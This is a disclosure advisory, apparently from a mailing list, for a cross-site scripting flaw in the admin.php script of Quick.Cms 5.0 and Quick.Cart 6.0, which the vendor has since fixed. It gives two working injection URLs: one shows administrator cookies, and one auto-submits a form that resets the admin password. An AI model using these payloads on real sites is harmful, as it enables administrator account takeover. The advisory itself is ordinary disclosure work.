[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Cross-Site Scripting (XSS) vulnerability in Quick.Cms and Quick.Cart



Advisory ID: HTB23135
Product: Quick.Cms, Quick.Cart
Vendor: OpenSolution team
Vulnerable Version(s): Quick.Cms 5.0, Quick.Cart 6.0 and probably prior
Tested Version: Quick.Cms 5.0, Quick.Cart 6.0
Vendor Notification: December 19, 2012 
Vendor Patch: December 20, 2012 
Public Disclosure: January 9, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2012-6430
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered XSS vulnerability in 
Quick.Cms and Quick.Cart - two products developed by OpenSolution team, which 
can be exploited to perform cross-site scripting attacks.


1. Cross-Site Scripting (XSS) vulnerability in Quick.Cms and Quick.Cart: 
CVE-2012-6430

The vulnerability exists due to insufficient filtration of user-supplied data 
in URI in the "admin.php" script. A remote attacker can trick a logged-in 
administrator to open a specially crafted link and execute arbitrary HTML and 
script code in browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to 
display administrator's cookies: 


http://[host]/admin.php/')"></select><script>alert(document.cookie);</script>/


Nevertheless, a remote attacker can create an exploit for this vulnerability to 
bypass application's CSRF protection mechanism based on the HTTP Referer header 
and get access to privileged functions of the application. To do so he have to 
trick a logged-in administrator to click on a malicious link with XSS exploit.

PoC (Prof-of-Concept) code below will change administrator's password to 
"password":

http://[host]/admin.php/')"></select><form 
action="http://[host]/admin.php%3fp=tools-config"; method="post"><input 
type="hidden" name="login" value="login"><input type="hidden" name="pass" 
value="password"><input type="submit" id="btn" 
name="sOption"></form><script>document.getElementById('btn').click();</script>/

Successful exploitation of the vulnerability requires that Apache directive 
"AcceptPathInfo" is set to "on" or "default" (default value is "default").

-----------------------------------------------------------------------------------------------

Solution:

Vendor fixed the vulnerabilities without adding information to Changelog. 
Upgrade to Quick.Cms 5.0 and Quick.Cart 6.0 released after December 19, 2012

More Information:
http://opensolution.org/download,en,18.html?sDir=Quick.Cart
http://opensolution.org/download,en,18.html?sDir=Quick.Cms

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23135 - 
https://www.htbridge.com/advisory/HTB23135 - Cross-Site Scripting (XSS) 
vulnerability in Quick.Cms and Quick.Cart.
[2] Quick.Cms and Quick.Cart - http://opensolution.org/ - Simple and easy to 
use or modify content management system (CMS) and shopping cart.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.